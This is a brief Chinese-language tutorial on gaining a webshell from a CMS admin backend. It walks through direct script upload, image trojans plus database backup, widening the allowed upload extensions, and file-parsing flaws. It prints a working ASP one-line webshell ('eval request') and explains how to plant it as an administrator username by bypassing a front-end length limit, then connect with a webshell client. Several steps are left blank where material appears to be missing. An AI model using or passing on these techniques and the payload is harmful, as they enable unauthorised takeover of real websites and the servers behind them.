方法一:直接上传getshell
以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下:
即可成功上传大马,并成功执行,从而拿下webshell。
坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用…/跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名
方法二:数据库备份getshell
以南方数据cms为例:
1,首先上传一张图片马上去,并且获取图片马的路径
2,在系统管理处选择数据库备份,进行数据库备份getshell,具体操作方法如下:
然后使用菜刀连接即可成功getshell。
当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库,比如通过新建管理员用户,将用户名用一句话木马代替(用户名通常有长度限制,在前端修改maxlength即可)
<%eval request ("pass")%>
然后再通过备份数据库getshell。
方法三:修改网站上传类型配置拿webshell
有的网站在网站上传类型中限制了上传脚本类型文件,我们可以去添加上传文件类型,如添加asp|php|jsp|aspx|asa|cer等来拿webshell。
方法四:利用文件解析漏洞来拿webshell
记录在了这篇博客上面